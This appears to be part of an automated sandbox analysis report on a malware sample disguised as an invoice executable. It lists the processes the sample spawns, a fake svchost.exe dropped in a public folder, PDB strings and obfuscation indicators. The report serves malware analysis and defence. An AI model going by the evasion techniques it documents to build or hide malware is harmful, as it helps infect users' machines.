      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /SpecialRun 4101d8 4716
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3236 -ip 3236
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 2232
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529847486.00000000015F3000.00000004.00000020.sdmp
      Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: ml.pdbLL source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: System.ni.pdb" source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.1381082381.0000000004DDE000.00000004.00000001.sdmp
      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: profapi.pdb[8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: rsaenh.pdbu8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb4 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529847486.00000000015F3000.00000004.00000020.sdmp
      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.1384536651.0000000000CC7000.00000004.00000001.sdmp
      Source: Binary string: ml.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: winnsi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: .ni.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: clr.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: ility.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: clrjit.pdbC8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: fltLib.pdb!8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: WinTypes.pdbo source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: rtutils.pdb3 source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: ole32.pdb-8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: urlmon.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1502896240.0000000001357000.00000004.00000010.sdmp
      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.1379876265.0000000000CD9000.00000004.00000001.sdmp
      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: System.ni.pdbT3sl source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbX source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529847486.00000000015F3000.00000004.00000020.sdmp
      Source: Binary string: msasn1.pdb} source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: mscoree.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB5 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1502896240.0000000001357000.00000004.00000010.sdmp
      Source: Binary string: dwmapi.pdbi8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdbC source: WerFault.exe, 00000016.00000003.1419804430.0000000005159000.00000004.00000001.sdmp
      Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbMI[)X) source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb' source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wmswsock.pdb) source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: nsi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: ntmarta.pdb{ source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb< source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: iertutil.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529847486.00000000015F3000.00000004.00000020.sdmp
      Source: Binary string: msasn1.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: combase.pdb source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: wimm32.pdbQ8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: iVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1502896240.0000000001357000.00000004.00000010.sdmp
      Source: Binary string: Accessibility.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdb+8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdbA source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: .pdb> source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1502896240.0000000001357000.00000004.00000010.sdmp
      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: msvcp_win.pdbO8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: Accessibility.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: rawing.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: fwpuclnt.pdbW source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.pdb{{ source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: version.pdbE8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: psapi.pdbG source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbEIC) source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbxl& source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: oleaut32.pdbs8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: winhttp.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wwin32u.pdb98 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: System.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: rtutils.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: rasman.pdb? source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.1384536651.0000000000CC7000.00000004.00000001.sdmp
      Source: Binary string: profapi.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, AdvancedRun.exe, 00000004.00000002.1336631747.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000005.00000000.1334457908.000000000040C000.00000002.00020000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: WLDP.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: sechost.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: rawing.pdb&& source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: clrjit.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: rasman.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: propsys.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb) source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529251324.00000000015E8000.00000004.00000020.sdmp
      Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: version.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wintrust.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: System.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: ore.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: cryptsp.pdb8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: psapi.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb]8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdb78 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: ws2_32.pdb5 source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: cldapi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.1379876265.0000000000CD9000.00000004.00000001.sdmp
      Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: powrprof.pdbg8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: combase.pdbk source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: System.Core.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wkernel32.pdb |I^ source: WerFault.exe, 00000016.00000002.1491750046.0000000004DDE000.00000004.00000001.sdmp
      Source: Binary string: System.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: edputil.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: crypt32.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: 18.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 18.2.CasPol.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Binary contains a suspicious time stampShow sources
      Source: initial sampleStatic PE information: 0x85456217 [Wed Nov 7 16:00:23 2040 UTC]
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_0040B550 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_0040B550 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_0040B50D push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 5_2_0040B50D push ecx; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_04F5E0F0 push eax; retf
      Source: 18.2.CasPol.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
